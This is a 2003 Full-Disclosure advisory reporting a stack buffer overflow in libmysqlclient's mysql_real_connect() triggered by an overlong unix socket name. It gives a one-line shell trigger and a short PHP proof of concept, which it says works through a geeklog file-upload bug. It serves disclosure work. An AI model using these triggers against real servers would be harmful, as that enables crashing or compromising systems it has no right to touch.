Products: libmysqlclient 4.x and below (http://www.mysql.com)
Date: 12 June 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net shaharil_at_scan-associates.net munir_at_scan-associates.net
URL: http://www.scan-associates.net
Summary: libmysqlclient 4.x and below mysql_real_connect() buffer overflow.
Description
===========
libmysqlclient is client library to communicate with mysql server.
Details
=======
There is stack buffer overflow in mysql_real_connect() function with long unix socket name (over 300 character).
ex:
mysql -S `perl -e 'print "A" x 350'` -hlocalhostproof of concept
----------------
This bug have succesfully test on safe_mode php in our latest geeklog bug
http://www.scan-associates.net/papers/geeklog.txt where user can upload *.php file.
<?php
for ($i;$i<350;$i++)
$buff .= "A";
ini_set("mysql.default_socket","$buff");
mysql_connect("localhost", "blabla", "blabla");
?>Vendor Response =============== Vendor has been contacted on 06/01/2003 and fix will available soon.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
